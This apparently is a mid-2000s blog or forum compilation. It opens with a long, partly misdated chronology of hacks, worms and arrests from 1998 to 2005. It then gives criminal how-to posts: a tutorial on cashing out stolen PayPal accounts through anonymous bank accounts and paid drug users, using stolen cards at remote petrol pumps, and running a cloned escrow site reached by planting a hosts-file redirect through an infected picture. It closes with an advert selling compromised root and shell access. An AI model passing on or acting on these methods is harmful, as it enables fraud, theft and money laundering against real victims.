1998.01.10 Citizens Bank homepage hacked getwork guerillas
1998.01.10 ValuJet homepage hacked
1998.01.10 Easy Software hacked OptikLenz
1998.01.10 Mega-Bytes of Ohio hacked OptikLenz
1998.01.10 Reviewonline hacked OptikLenz
1998.01.10 Computer Tuto Training and Service hacked OptikLenz
1998.01.10 Youngstown Electric Company hacked OptikLenz
1998.01.11 ASI Net, Uruguay hacked Magica de Bin
1998.01.11 Silicon Investor NT server brought down by bonk DoS
1998.01.12 www.bass.com.my in Malaysia hacked
1998.01.12 ASI Net, Uruguay hacked Magica de Bin
1998.01.13 Boeing 401(k) temporary PIN numbers grabbed by hackers
1998.01.14 www.akam.tr (Turkey) hacked uberhacker
1998.01.14 Berkeley Instructional Technology Program hacked Magica de Bin
1998.01.14 WV Library Commission web site hacked
1998.01.15 www.emergent.com hacked L.O.U.
1998.01.15 military sites (.mil and some .gov) hacked - 200 servers Makareli, TooShort
1998.01.16 Tallahassee Freenet hacked; shut down to protect it
1998.01.16 Iowa Community College hacked by Zyklon (Eric Burns)
1998.01.16 SoftFair hacked bash
1998.01.16 Global Technology Marketing spam site killed
1998.01.17 www.scala.se software company hacked critic
1998.01.17 www.avd.nl hacked critic
1998.01.17 www.thebuzz.com KTBZ FM radio web site hacked
1998.01.18 over a dozen Indonesia web sites hacked LithiumError; ChiKo
1998.01.18 Industrial Dev Org of the UN hacked; unprotected Solaris box
1998.01.18 Branson school hacked
1998.01.18 Maine College hacked Zyklon
1998.01.18 Community Oriented On Line Networks hacked Mr 90
1998.01.18 www.kommanet.nl hacked critic
1998.01.19 www.kalnet.com hacked; running Apache on linux box
1998.01.20 Commission of the European Communities web site hacked Zyklon
1998.01.20 www.linkz.com web site hacked
1998.01.21 www.legislate.com hacked Noid
1998.01.21 www.bash.com hacked the hacker alliance
1998.01.22 www.kpc.lt hacked DaBoo
1998.01.22 Oakland, CA Unified School District webpage hacked tease
1998.01.24 www.kleiber.com hacked GiftGas
1998.01.24 Program One, Inc hacked SpiritWalker, Sn1per, GiftGas
1998.01.25 www.hartnet.org hacked OptikLenz
1998.01.25 Colorado Legal Eagles hacked pascal trio (zyklon)
1998.01.25 Univ of Seville server hacked Zyklon
1998.01.25 Umeå University, Sweden hacked Toxic Edge
1998.01.26 www.homeguard.net hacked
1998.01.27 Walnut Ridge HS, Arkansas hacked OptikCore
1998.01.27 Virginia Commonwealth University hacked Zyklon
1998.01.27 Prairie View A&M Univ hacked Zyklon
1998.01.28 Internet traffic re-routed through USC computers as a test Postel, Jon
1998.01.28 www.datapark.net hacked GiftGas
1998.01.29 www.hackchat.com hacked Nation
1998.01.29 www.dragonserve.com hacked T.H.E.
1998.01.29 www.resopal.nl hacked SpiritWalker, Sn1per, SisterMoon
1998.01.29 www.connectos.com SpiritWalker, Sn1per, SisterMoon
1998.01.30 Calgary Unix Users Group hacked sreality and #pascal crew
1998.01.30 AllSeasons Travel hacked Claire Danes
1998.01.31 www.webbnet.com hacked xenon
1998.01.31 www.gpg.com hacked xenon
1998.01.31 www.branson.org hacked xenon
1998.02.01 www.netbank.net.tw hacked
1998.02.01 Langley AFB home page hacked Noid Crew
1998.02.01 Kuwait University home page and domain hacked
1998.02.01 www.tamu-commerce.edu hacked xenon
1998.02.02 www.pcconcepts.com hacked zipoff, Hosser
1998.02.04 mexico finance ministry hacked LoTek (High Tech Teens)
1998.02.04 www.ddd.fr hacked
1998.02.05 cccookies hacked Kalony
1998.02.07 dynatek infoworld hacked tech voodoo crew
1998.02.07 computer beratung direkt hacked the Amish Ninjas
1998.02.07 presage internet hacked JF Josh Freedaleman
1998.02.07 boimag in UK hacked JF Josh Freedaleman
1998.02.08 Uniformed Services University of Health Science hacked No|d Crew
1998.02.08 over 20 com sites hacked brain candy
1998.02.08 thermocret site hacked JF Josh Freedaleman
1998.02.08 nuvocom site hacked No|d Crew
1998.02.08 tvweather hacked tech voodoo crew
1998.02.08 danehio entertainment hacked Lord Acid
1998.02.08 century die hacked Lord Acid
1998.02.08 over a dozen sites hacked Bill Gates hackers
1998.02.09 SunSITE hacked in Hong Kong Magica de Bin
1998.02.10 www.knesset.gov.il hacked
1998.02.11 www.odi.com.pl (Poland) hacked TPSA team
1998.02.12 www.on-the-hook.com hacked Noid/TechVoodoo
1998.02.12 www.conceptsvisual.com hacked (concepts visual) Noid/TechVoodoo
1998.02.12 www.1792.com (arthur register) hacked Noid/TechVoodoo
1998.02.14 www.gov.com hacked LordSomer, The Hackers Layer
1998.02.16 www.vpac.org (virtual police) hacked lunar.shake.org
1998.02.16 www.phpages.com hacked Noid/TechVoodoo
1998.02.17 Alis Technologies hacked Magica de Bin
1998.02.17 www.top50mp3.com hacked Prizm
1998.02.18 Thermocresteusa hacked JF Josh Freedaleman
1998.02.18 XHN Industries hacked KaGe of Mising Link
1998.02.19 Intellus in Norway hacked
1998.02.19 Interpraesenz Online Service hacked amish group
1998.02.19 Saatchi & Saatchi hacked (used Shockwave) trix and vertes
1998.02.19 maxout hacked JF Josh Freedaleman
1998.02.20 Thomas More College hacked Magica de Bin
1998.02.21 humblebums.com hacked Noid/TechVoodoo
1998.02.21 Jacksonville U hacked
1998.02.22 One Life Crew hacked
1998.02.22 Huntingtimes.com hacked cyberchrist
1998.02.22 allwrestling.com hacked cyberchrist
1998.02.23 Systematic.com hacked Claire Danes
1998.02.24 GeBeKo in Germany hacked
1998.02.24 16 sports, cars, toy stores hacked Kalony
1998.02.24 webglass.com hacked Claire Danes
1998.02.24 duesseldorf.com hacked Claire Danes
1998.02.24 hellas-on-business (Greece) hacked Claire Danes
1998.02.25 MIT Plasma & Fusion Center (PSFC) and DoD computers hacked by Analyzer (Ehud Tenenbaum)
1998.02.26 Solar Sunrise - DoD hacks (7 AF sites, 2 navy sites)
1998.02.27 Napier University, Edinburgh, UK hacked Magica de Bin
1998.02.27 Hypermall (athena.hypermall.com) hacked The Noid / TechVoodoo
1998.02.27 BEBEnterprises (www.localafffairs.com) hacked The Noid / TechVoodoo
1998.03.01 Sprint International Global One hacked Simon
1998.03.02 Persatuan Hackers Indonesia hacked
1998.03.03 NetDex ISP hacked by The Analyzer and The Enforcers (Tenenbaum)
1998.03.03 Izmir College, Turkey hacked Painfall for Ravena
1998.03.03 U of Bordeaux hacked Magica de Bin
1998.03.04 At least 25 universities hacked (exploiting Windows 95 and NT)
1998.03.04 Yuzuncu Yil U hacked
1998.03.05 Cybermall hacked
1998.03.05 Nambla.org hacked 74074
1998.03.06 PBS server hacked Zyklon
1998.03.07 Jerusalem Post hacked
1998.03.08 Brookhaven National Lab hacked Toxic 'n Xnec
1998.03.08 Rainbow Casino hacked seal
1998.03.08 US Army 7th Brigade hacked Noid
1998.03.08 US Army Air Defense Artillery School at Ft Bliss hacked Noid
1998.03.08 US Army executive s/w systems directorate hacked Noid
1998.03.08 Patricia Seybold Group hacked Noid
1998.03.09 Naval Space Command hacked The Noid / TechVoodoo
1998.03.09 Keystone Central School District hacked Zyklon
1998.03.09 Cheesi s/w hacked
1998.03.10 K12 domain hacked
1998.03.10 NASA Ames (zeus.arc.nasa.gov) hacked Magica de Bin
1998.03.10 Learninglink.org hacked
1998.03.15 Stockton Community Wide Web hacked
1998.03.17 University of Minnesota hacked
1998.03.18 Ehud Tenenbaum arrested for hacking (The Analyzer)
1998.03.30 T-Online (German telephone company) hacked
1998.04.09 Stanford reloaded files from corrupt backup tape, destroying faculty files
1998.04.17 NASA computers at JPL broken into and rootkit added (Raymond Torricelli)
1998.04.22 DISN (DISA) hacked; DEM hacked which controls GPS Masters of Download (MoD)
1998.00.00 Presidential Decision Directive 63 signed; protect nation's critical infrastructure
1998.05.00 Max Vision (Max Butler), the Equalizer released backdoor to military computers
1998.05.30 AOL social engineered to grant access into the ACLU web site
1998.06.15 Indian nuclear research center servers hacked MilW0rm
1998.06.23 new Word macro virus - WM/Poly-Poster
1998.06.30 US Coast Guard personnel database wiped out by disgruntled employee Singla, S
1998.07.00 Meganet in CA sees massive attacks against them; tracked back to Russia Academy of Sciences
1998.07.05 300 web sites hacked Milw0rm and Ashtray Lumberjacks
1998.07.10 ProHost hacked Milw0rm
1998.07.15 Time Warner Systems hacked LoU
1998.07.17 Back Orifice introduced Cult of Dead Cow (cDc)
1998.08.00 Navy sees more intrusions in Pac Fleet and Pacific Command
1998.08.01 45 Indonesian sites hacked KaotiK Team
1998.08.15 180,000 passwords stolen; 48,000 cracked by Jack the Ripper program
1998.08.23 Paramount web site hacked Zyklon (Seattle - LoU)
1998.08.24 Internet Alaska hacked; attacked by the smurf attack
1998.08.30 Australian government's web site hacked
1998.09.13 NY Times hacked HFG (Hacking for Girlies)
1998.09.17 2,585 US West computers hacked to find prime number Blosser, Aaron
1998.09.19 hackers sabotage web site of Sweden's main opposition party
1998.09.20 hackers from 15 locations attacking Navy web sites (SHADOW sees trends at SPAWAR)
1998.09.23 internet auction sites have had their credit cards, info, exposed
1998.10.01 www.slashdot.org hacked
1998.10.01 24,000 domains hacked; hosted by japan.co.jp Legions OfThe Underground
1998.01.01 300 domains hacked Ashtray Lumberjacks
1998.10.07 478 domains hacked Cha0s
1998.10.13 4 men installed chips in gas pumps to cheat consumers
1998.10.13 DoD attacks hacker group with information warfare techniques Electronic Disruption Theater
1998.10.15 hackers invade India army site about Kashmir
1998.10.27 China's Human Rights site Hacked bronc (LoU)
1998.10.28 Rootshell hacked thru ssh-1.2.26
1998.11.00 Cloverdale Two sentenced to 3 years probation
1998.11.06 hacker convicted of hacking into U of Iowa and U of Wisconsin Mitra, Rajib
1999.11.15 Varna Hacking Group cracks home page for the Cartoon Network cable channel
1999.02.01 Canadian team charged in Smurf attack; attacked Sympatico ISP
1999.02.16 id Software website defaced (Doom and Quake) using uploader.exe mEsachicken
1999.02.19 COMDEX Website Defaced E-pROM
1999.02.01 www.conservative.org hacked Diablo
1999.01.13 Censure and Move On site hacked
1999.02.15 15 year old from Vienna hacks into Clemson U
1999.02.23 Dutch site, www.vaart.nl, hacked
1999.03.00 Moonlight Maze Russian Academy of Sciences hacking attacks against DoD
1999.03.03 Monicalewinsky.com site hacked MagicFX
1999.03.15 Navy's Medical Information Mgt Center in Bethesda hacked Russian supporters of Serbia
1999.03.24 NATO web site in Brussels knocked down Serb hackers
1999.03.29 Melissa macro virus affects 100,000 email users; written by David Smith
1999.04.04 Canadian hackers attack 13 major corporate sites Yorkshire Posse
1999.04.15 I. Iffih hacks into ZMOS, Washington State and into NASA and DDLA
1999.04.20 Patuxent River Naval Air Station spammed with "Serbia is here" email Belgrade hacker
1999.04.21 hacker broke into Washington National Airport air traffic control frequency
1999.04.23 hacker breaks into U of Washington web site gh (global hell)
1999.04.26 Chernobyl CIH virus
1999.05.01 Dutch hackers (Dutchthreat) hack Yugoslav web server
1995.05.05 hacker steals Hotmail passwords
1999.05.07 Hackers targeting US sites (DOE, Dept of Interior) in protest of Chinese embassy bombing in Belgrade
1999.05.11 Hack against White House web site (www.whitehouse.com) by global hell
1999.05.26 hack against FBI web site
1999.05.27 hack against US Senate web site
1996.06.01 Interior Department hit by hackers
1999.06.11 hack against US Senate web site again (Varna Hacking Group)
1999.07.07 Back Orifice 2000 released
1999.08.30 ABC news broken in by "The United Loan Gunman"
1999.09.30 Ontario Ministry of Northern Development and Mines hacked by Sarin
1999.09.06 C-Span broken in by "The United Loan Gunman"
1999.09.07 Level Seven Crew hack US Embassy in China
1999.09.07 Scottish Executive Website hacked by Scotland hackers
1999.09.08 KKK site hacked
1999.09.09 International Association for Counterterrorism & Security Professionals hacked by bowlerz
1999.09.09 AOL ICQ passwords stolen with trojan horse disguised as jpeg file
1999.09.13 Drudge Report broken in by "The United Loan Gunman"
1999.09.13 South Africa's official statistics website hacked
1999.09.15 Nasdaq and American Stock Exchange broken in by "The United Loan Gunman"
1999.09.19 NAACP broken in by "The United Loan Gunman"
1999.09.22 Rogers University hacked by bl0w team
1999.09.23 Ranger Power hacked by LevelSeven
2000.01.10 CD Universe hacked by Maxus; 350,000 credit cards stolen; $100K ransom demanded; numbers posted on Web
2000.01.15 Curador steals over 23,000 credit card numbers from 8 small companies
2000.01.17 Library of Congress web site defaced by LmT; users prevented from accessing congressional legislation
2000.02.07 Yahoo, eBay, Amazon, Buy.com, CNN hit with a distributed DoS; done by MafiaBoy
2000.02.09 ZDNet and e*trade hit with a DDoS; done by MafiaBoy of Canada
2000.02.15 Ray Torricelli hacks into JPL computers; stole credit card numbers and passwords
2000.03.12 Crime Boys from Brazil hack Interior Dept, Army ROTC, JPL
2000.03.15 Raphael Gray arrested for stealing credit card information; used Gates credit details
2000.03.28 hacker puts sniffer program between AMC at Scott AFB and DOT in MA
2000.05.00 GAO auditors gain access to many DoD sensitive sites
2000.05.15 Love Bug virus sent from Philippines; AMA computer college
2000.06.01 Qualcomm in San Diego hacked by U of Wisconsin student
2000.06.04 Internet.com hijacked
2000.06.15 hacker cracks into Redhotant and steals 24,000 credit card numbers in Kent
2000.06.18 AOL cracked with trojan horse program; 500 subscribers had information stolen
2000.06.20 life stages virus
2000.06.21 Nike site hacked by S-11 group
2000.07.07 Powergen in UK cracked; credit card numbers stolen
2000.08.15 Bret McDanel (Secret Squirrel) spams his company's (Tornado) computer in Del Mar, CA; charged with spamming
2000.09.15 Western Union hacked; 15,000 credit cards exposed
2000.09.26 Jason Diekman (Shadow Knight, Dark Lord) arrested; hacked JPL, Stanford, Harvard
2000.10.00 Microsoft hacked by St Petersburg hacker
2000.11.10 FBI lure 2 Russians to Seattle, monitor connections, hack into russian servers; 1st government hack
2000.12.13 55,000 credit card numbers stolen from Creditcards.com; hacker tried to extort the company; numbers exposed on the Web
2000.12.15 Egghead.com hacked; they have 3.7 million customers; banks issued new credit cards
2000.12.24 hackers steal source code for OS/COMET by Exigent (Melbourne, FL) from US Naval Research Lab
2001.01.15 Indiana U School of Music hacked; stolen Social Security numbers, etc
2001.01.18 Mafiaboy pleads guilty to hacker charges in Montreal
2001.01.22 hacks against CA Republican caucus and Alaska Dept of Interior; US, UK, Australia
2001.01.24 misconfigured router cuts off some Microsoft sites
2001.01.26 hackers attack official Vatican radio website
2001.02.01 hacker steals data from the World Economic Forum, including credit cards
2001.02.12 Anna Kournikova virus released by OnTheFly (20 year old Dutchman)
2001.02.23 Ikenna Iffih charged for hacking NASA, DoD
2001.03.01 40 e-commerce sites in 20 states hacked by Russian groups; million credit card numbers stolen
2001.03.15 Updated version of backdoor program SubSeven (ver 2.2) released
2001.04.11 Consumer Product Safety Commission hacked by COBR4S
2001.04.12 Chinese hackers attack US web sites over spy plane issue; hack Navy Acquisition system
2001.05.07 Diablo2 game site hacked
2001.05.04 Gibson Research Corp hacked by 13 year old (wicked)
2001.05.11 Solaris/IIS worm
2001.05.15 hackers attack U of Washington and put file sharing program on its computers
2001.05.17 Fluffy bunny hacks Apache.org and SourceForge linux site
2001.05.24 Indiana U hacked with the rpc.statd buffer
2001.05.25 Whitehouse.gov hacked, causing denial of service (May 4 repeat)
2001.06.13 "security" domain sites hacked
2001.06.13 European Union "Safer Internet" site hacked
2001.06.14 California Independent System Operators power grid hacked
2001.06.15 ex US Senator's wife sent email nastygrams using hotmail; gets caught
2001.06.20 Zixit credit card database accessed
2001.07.19 Code Red/SirCam
2001.07.23 Dmitry Sklyarov arrested at DefCon for creating program to copy Adobe electronic books
2001.07.15 Ecount gift certificate service hacked by Zilterio; demanded $45,000 to protect 350,000 customers
2001.08.21 Washington-based Riggs bank Visa customer database hacked into
2001.09.18 Nimda worm
2001.10.10 Vasily Gorshkov convicted of 20 counts of fraud and computer crimes; he stole credit card numbers; defrauded PayPal
2001.11.15 insecure satellite link not encrypted allowed for spy satellite images
2001.11.19 156 web sites hosted by Vietnam hacked by revengetheplanet
2001.11.20 playboy.com hacked by Ingreslock; credit card numbers grabbed
2001.11.20 25 church web sites hacked by Hacking for Satan
2001.11.24 Qualcomm hacked by someone at U of Wisconsin
2001.11.25 BadTrans worm
2001.11.27 2 former Cisco accountants sentenced to 34 months for breaking into company computers and stealing stock
2001.12.04 Goner worm
2001.12.07 4 Israeli college students arrested for creating Goner
2001.12.10 GAO site hacked by Anti India Crew (Alqaeda Muslim Alliance)
2001.12.19 Zacker (Maldal) worm
2002.02.15 Lamo hacks New York Times
2002.03.10 Georgia Tech hacked; financial records and credit cards exposed
2002.04.15 Klez virus; 800,000 copies
2002.04.22 Deceptive Duo hacks into US Navy web site
2002.04.23 Deceptive Duo hacks into NASA and DOT web site
2002.04.24 Deceptive Duo hacks the FAA
2002.04.29 Deceptive Duo hacks into Colorado airport web site
2002.04.30 Indiana State University accidentally posts personal info on 10,000 students on the Web
2002.05.01 holes discovered in Best Buy and Home Depot wireless LANs
2002.05.10 California State Controller computer hacked; 265,000 names exposed
2002.05.24 Kim Schmitz (kimble hacker (YIHAT)) convicted of insider trading of LetsBuyIt
2002.05.28 TheNerds.Net online electronics store hacked by Zilterio; 100,000 customers
2003.01.25 Slammer (Sapphire) worm; fastest worm in history; affected Microsoft SQL servers; 100,000 hosts
2003.06.04 Bugbear worm; tries to steal passwords and credit card information
2003.07.15 JuJu Jiang arrested for putting a keystroke logger on a New York Kinko's computer.
2003.07.30 DCOM/RPC exploit detected
2003.08.07 Acxiom hacked, customer information exposed; hacked by Daniel Baas of Ohio
2003.08.11 Blaster worm; uses the dcom rpc exploit
2003.08.18 Sobig.F worm; $50 million in damages; source of program was porn site
2003.08.18 Nachi (Welchia) worm; tries to remove Blaster worm and put on patch
2003.08.30 MiMail email worm
2003.09.05 Dan Diobanu of Romania arrested for Blaster-F worm
2003.09.09 Adrian Lamo surrenders to federal authorities for hacking New York Times
2003.09.18 Swen (Gibe) worm; looks like a Microsoft advisory
2003.09.20 anti-spam sites hacked by spammers
2003.09.24 1,000 car shoppers' credit details exposed in bulk on Dealerskins
2003.09.26 Jeffrey Parson arrested for writing blaster worm variant
2003.09.29 Brett O'Keefe, CEO of ForensicTec Solutions, arrested for hacking into military and government computers
2003.10.01 QHosts Trojan Horse; alters DNS settings
2003.10.09 Van Dinh arrested for cyber stock scam
2003.10.25 Three Michigan men get into Lowe's wireless computer system and steal credit card information
2003.11.05 Brazilian police arrest 18 Internet hackers
2003.12.22 Lech Johansen acquitted of hacking into DVD security codes
2004.01.26 Mydoom (Novarg) virus released
2004.03.15 T-Mobile USA internal systems hacked, including Paris Hilton's cell phone data
2004.04.15 computers at Patuxent River NAS, White Sands Missile Range, and JPL hacked by Stakkato
2004.04.29 Sasser worm (netsky) released by Sven Jaschan in Germany
2004.05.15 portion of Cisco's IOS code illegally copied and posted on the Internet; done by Swedish teenager
2004.10.15 University of Texas student hacked into the school and stole info on 37,000 students and employees
2004.11.15 University of Georgia school computer hacked, which may have exposed 32,000 student credit card numbers
2004.12.14 Michigan man sentenced to 9 years for hacking into Lowe's hardware stores
2004.12.15 Zafi Merry Christmas worm released
2004.12.31 Daniel Cuthbert releases the Tsunami donation hack
2005.03.04 Harvard, MIT, and Stanford business schools admissions hacked
2005.03.20 California State University at Chico hacked; information on students stolen
2005.06.15 hacker may have accessed 40 million credit card numbers from CardSystems Solutions, Inc
2005.06.20 University of Southern California online application system hacked
2005.08.25 Chinese hackers may be hacking into US government computers; FBI investigating
2005.09.14 Teenager sentenced 11 months for the T-Mobile and Paris Hilton cell phone hack
2004.09.15 Hacker accessed UC Berkeley research being done for Dept of Social Services; info on 600,000 people exposed
2005.06.02 South Korea MSN hacked and password-stealing software planted on it
2005.09.19 University of Georgia hacked; info on 1,600 employees, including Social Security numbers, accessed
2005.10.05 Daniel Cuthbert convicted of breaking the Computer Misuse Act from releasing the Tsunami donation hack
2005.10.12 Microsoft Windows Genuine Advantage antipiracy system cracked

PayPal cashing tutorial

If you have the paypals you are going to use, then all you need is the following.
Get an ANON bank account. Take the information from that account and set up a paypal account in the same name and info as the bank account. Get your paypal account verified. Then transfer the money from the paypals you have into the paypal you created. Then fast as you can transfer the cash from the paypal you created to the bank account you have. Get this cash out of there as fast as humanly possible as paypal does like to do charge backs in a hurry.
Also if you are doing this for more than a couple of hundred bucks and want to get all of the cash out, you have to have the account in a local bank, ATMS will not work they have daily limits that wont allow a person to reap all the money that they have worked so hard for.
Yeah that has been a problem lately. The only and surest way to make sure that you get your cash is to buy an ANON account or get one set up yourself. You can buy latvian bank accounts,with high limits, and to be honest it is safer fro you financially to set it up yourself. All a person would have to do is to keep the id that the account was set up in and call periodically to check on the balance of the account. When a large amount hits, bam the guy pulls it out, thus screwing over the buyer of the account. this is a scam that would be profitable, but not too cool ya know.
So in short set the account up yourself or pay someone to do it for you. Another way to avoid getting screwed over would be to have some crack head open it for you. This was they are not looking for you they would have their face on the cameras. Even have them go in and get the money out. But be in the parking lot waiting while this happens. Give them like 10% of whatever is pulled out. This is not much, but i know personally that most people are happy with this amount of money, and wont complain, especially if they are looking to use their share for dope or whatever. Just dont use the same person all the time, and make sure that they are smart enough to be able to act their part. Also make sure that they have a good novelty in hand, otherwise they are screwed from the get go. When they are done setting up the account, you hold the bank account info, atm card, and ALL forms of id that was used to set it up. This cuts down on the chance of your account opener screwing you over by just taking the money and running.
Also avoid using Wells Fargo or Bank One at all costs. Dont need to say why, but trust me you dont want to try and use them for something like this.
Accounts should be with online access,coz paypal deposits money,and u have to look for two deposit from paypal.
Withdrawal for us ppl is 3-5days,and for u.k ppl 5-7.I don't know how about other countrys.
Best way to send funds with balance and instant transfer,coz this is non-refunable.So You have no worries.
Happy cashing.

using used-embossed cards for instore

Another thing is to get it done via someone known ...
For example, Now what I do is ... goto some rural petrol pump (there are about each 100 each on a 200 km highway here all owned by corrupt politicians)
And then fill petrol woryh 800 Rs (20$) and swap the card for 500$
I repeat this procedure a couple of times ... until the card limit is reached ....
And the petrol pumps are so remote ... and far away ... tht even chargeback companies refrain frm goin there ....
The remaining money I get in cash n I pay somethn to the guy ...
I have been cashing even unembossed cards for long this way ....

ok, so the sticker; there are like 4 different types of those stickers that shops but on their door to inform you that they accept credit cards in this country.
Apart from the Visa, MC, Diners.. etc logo's there is also the name of the company that supplied them with their terminal.
Once i've noticed how each one of them works i can be almost sure what the printout coming out from their terminal will look like from the sticker on the door of the shop.

DNS poisoning

i can make dns poisoning so it doesnt matter the name of your site...could be ccpower...or butterandjam.com as long as it's got a dedicated ip.so when the person will type www.escrow.com it will go to your website and in link will appear www.escrow.com.

Good site bro ...
But as far as my experience goes in this world to get online clients either you nee to have a very advanced design or if u have a stupid design u should have a very well established name.
At the moment I'd ask you to Re design your site using any TM template .. or if you want I can do it for a fee.
Secondly, Card adword vouchers ... And advertise on google ...
Thirdly, Buy a good virgin mailing list and spam using a dedicated server.
Donot go in for heavy design of the mails juss normal stuff with written articles.
And remember DONOT SPAM YOUR SITE directly ...
Instead ... buy a domain like bestescrow.com or something .... or ifoundit.com
then write a well designed one page salesletter (again i can do it for a fee)
and then spam the link to this page
Buy a skype number foir UK/US using skypeIN and forward it to your cell.
There you are all set ....
Now let everyone fuck wioth you Provide the best solutions don;t make them too good to be true ... but the trick is ...
Tell the people what they wanna hear
and you should have a couple thousand clients in no time ....
Hope it helps...
Anarkist

guys it is just s simple program that will add in C:\WINDOWS\system32\drivers\etc\hosts a new line www.fakeescrow.com escrow-ip
the problem is how to infect them
anyhow, i think is better to tell them that you will send first the item through dhl or fedex, etc and after they`l reiceve the ship track number they will send you the money, make the dhl scan page and send them from service@dhl.com subject: Ship Tracking number for transaction #X
... your esrow site will not stay up for long time


simple?woudnt say that....let me tell you how exactly this works.
as everybody know every auction website have a special link dedicated to scams were they present safe way of payment.
as escrow form of payment they insist on www.escrow.com and not other dodgy website.many ppl checked at least once the orginal website to see how exactly and escrow looks so...it is very important that your escrow will looks exactly as the original one and have the same link.
how you do that?buy a dedicated ip host , make a clone of the orignal escrow but on the main page replace the payment forms with WU or MG.delete the other safe steps explained there and there you go...you got an original escrow.
the link doesnt matter ... could be www.bunnysandrabbits.com or www.toysforgirls.com as after dns poisoning it will appear www.escrow.com in the link.
how am i doing that? well ... either as a seller you send them pictures of your product,either as an admin of escrow send them an invoice.
so they will double click on the picture ... they will see what they asked and cannot be suspicios at all
so there isnt a program that change the host...it's a mix of 2 applcations.if you ask them to download a stupid file...not so many will do it but if they asked for a picture and you send them,i'm 100% sure that they will see'it.
once seen their host is fuckedup so any time they will try log on to escrow.com they will go at your website and the link will be the same www.escrow.com
you can do many tricks like that....you can try with 3bay aswell...or running a spam...any ideeas comes into your mind.

Thursday, April 20, 2006

roots and shells seller!

$30 for root WITH php and smtp
$20 for root WITHOUT php and smtp
$8 for shell (sometimes without php)

YM: blindroot@yahoo.com
MSN: blindroot@yahoo.com
ICQ: 254477048

Dangerous Mind...

Mark Perkel is a self-proclaimed genius who shares his ideas with the world. He is not just another crank announcing the end of the world or the coming of Christ, but someone intelligent and well-informed, whose articles (more than 50,000!) are quite lucid and enlightened. Politics, religion, science and philosophy are some of the topics he chooses. He even gives advice on how to use the services of prostitutes. A page with excellent articles.

http://www.perkel.com/

Hide my ass.

For more privacy when browsing the Internet, there is a new online tool that lets you, simply and for free, hide your IP and other data that can be extracted when you visit a site. Suggestive...

http://www.hidemyass.com/